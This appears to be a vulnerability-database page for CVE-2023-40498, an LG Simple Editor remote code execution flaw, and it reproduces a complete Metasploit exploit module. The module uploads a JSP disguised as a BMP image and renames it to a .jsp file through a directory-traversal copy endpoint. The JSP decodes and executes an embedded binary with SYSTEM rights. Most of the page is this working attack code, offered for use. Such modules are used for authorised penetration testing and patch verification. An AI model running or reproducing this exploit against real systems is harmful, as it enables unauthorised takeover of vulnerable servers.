LG Simple Editor Remote Code Execution

🗓️ 08 Sep 2023 19:52:18Reported by rgod, Ege Balcı <[email protected]>Type

LG Simple Editor Remote Code Execution through Access Control and Directory Traversal vulnerabilities in versions prior to v3.21, allows an attacker to upload and execute a malicious JSP payload with SYSTEM user permissions

Reporter	Title	Published	Views	Family All 13
0day.today	LG Simple Editor Remote Code Execution Exploit	11 Sep 202300:00	–	zdt
ATTACKERKB	CVE-2023-40498	3 May 202403:15	–	attackerkb
Circl	CVE-2023-40498	7 Sep 202320:45	–	circl
CNNVD	LG Simple Editor 安全漏洞	3 May 202400:00	–	cnnvd
CNVD	LG Simple Editor Remote Code Execution Vulnerability	19 Jul 202400:00	–	cnvd
CVE	CVE-2023-40498	3 May 202402:11	–	cve
Cvelist	CVE-2023-40498 LG Simple Editor cp Command Directory Traversal Remote Code Execution Vulnerability	3 May 202402:11	–	cvelist
NVD	CVE-2023-40498	3 May 202403:15	–	nvd
OSV	CVE-2023-40498	3 May 202403:15	–	osv
Packet Storm	LG Simple Editor Remote Code Execution	8 Sep 202300:00	–	packetstorm

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper # includes register_files_for_cleanup
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'LG Simple Editor Remote Code Execution',
        'Description' => %q{
          This Metasploit module exploits broken access control and directory traversal
          vulnerabilities in LG Simple Editor software for gaining code execution.
          The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.
          By exploiting this flaw, an attacker can upload and execute a malicious JSP
          payload with the SYSTEM user permissions.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'rgod', # Vulnerability discovery
          'Ege Balcı <[email protected]>' # msf module
        ],
        'References' => [
          ['ZDI', '23-1204'],
          ['CVE', '2023-40498']
        ],
        'DefaultOptions' => {
          'WfsDelay' => 5
        },
        'Platform' => %w[win],
        'Arch' => [ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          ['LG Simple Editor <= v3.21', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-08-24',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/'])
      ]
    )
  end

  def check
    res = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do')
      }
    )

    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?

    version_text = res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', '')
    return Exploit::CheckCode::Unknown('Could not determine version') if version_text.blank? || version_text == 'Unknown'

    version = Rex::Version.new(version_text)
    return Exploit::CheckCode::Unknown('Could not parse version') if version == Rex::Version.new('0')
    return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0')

    Exploit::CheckCode::Safe("Target is not vulnerable based on version: #{version}")
  end

  def generate_jsp_payload
    exe = generate_payload_exe
    base64_exe = Rex::Text.encode_base64(exe)
    payload_name = rand_text_alpha(rand(3..8))

    var_raw = 'a' + rand_text_alpha(rand(3..10))
    var_ostream = 'b' + rand_text_alpha(rand(3..10))
    var_buf = 'c' + rand_text_alpha(rand(3..10))
    var_decoder = 'd' + rand_text_alpha(rand(3..10))
    var_tmp = 'e' + rand_text_alpha(rand(3..10))
    var_path = 'f' + rand_text_alpha(rand(3..10))
    var_proc2 = 'e' + rand_text_alpha(rand(3..10))

    jsp = %|
    <%@page import="java.io.*" %>
    <%@page import="sun.misc.BASE64Decoder"%>
    <%
    try {
      String #{var_buf} = "#{base64_exe}";
      BASE64Decoder #{var_decoder} = new BASE64Decoder();
      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

      File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");
      String #{var_path} = #{var_tmp}.getAbsolutePath();

      BufferedOutputStream #{var_ostream} =
        new BufferedOutputStream(new FileOutputStream(#{var_path}));
      #{var_ostream}.write(#{var_raw});
      #{var_ostream}.close();
      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
    } catch (Exception e) {
    }
    %>
    |

    jsp.gsub!(/[\n\t\r]/, '')

    jsp
  end

  def copy_file(src, dst)
    data = {
      command: 'cp',
      option: '-f',
      srcPath: src,
      destPath: dst
    }
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'fileSystem',
                               'makeDetailContent.do'),
        'headers' => {
          'X-Requested-With' => 'XMLHttpRequest',
          'Accept' => 'application/json'
        },
        'ctype' => 'application/json',
        'data' => data.to_json
      }
    )
    if res && res.code == 200 && res.body.to_s.include?('errorMessage":"success",')
      print_good "#{src} -> #{dst} copy successfull."
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not copy the payload.")
    end
  end

  def exploit
    rand_name = Rex::Text.rand_text_alpha(5)
    form = Rex::MIME::Message.new
    form.add_part(
      generate_jsp_payload,
      'image/bmp',
      'binary',
      "form-data; name=\"uploadFile\"; filename=\"#{rand_name}.bmp\""
    )
    form.add_part('/', nil, nil, 'form-data; name="uploadPath"')
    form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_x"')
    form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_y"')
    form.add_part('1920', nil, nil, 'form-data; name="uploadFile_width"')
    form.add_part('1080', nil, nil, 'form-data; name="uploadFile_height"')

    print_status 'Uploading JSP payload...'
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadImage.do'),
        'ctype' => "multipart/form-data; boundary=#{form.bound}",
        'data' => form.to_s
      }
    )
    if res && res.code == 200
      print_good 'Payload uploaded successfully'
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Payload upload failed")
    end

    # Now we copy our payload as JSP
    copy_file("/#{rand_name}_original.bmp", "/#{rand_name}.jsp")
    register_files_for_cleanup("./webapps/simpleeditor/#{rand_name}.jsp")

    print_status 'Triggering payload...'
    send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'simpleeditor', "#{rand_name}.jsp")
      }
    )
  end
end

22 Jun 2026 19:02Current

8.6High risk

Vulners AI Score8.6

CVSS 3.19.8

CVSS 39.8

EPSS0.82964

SSVC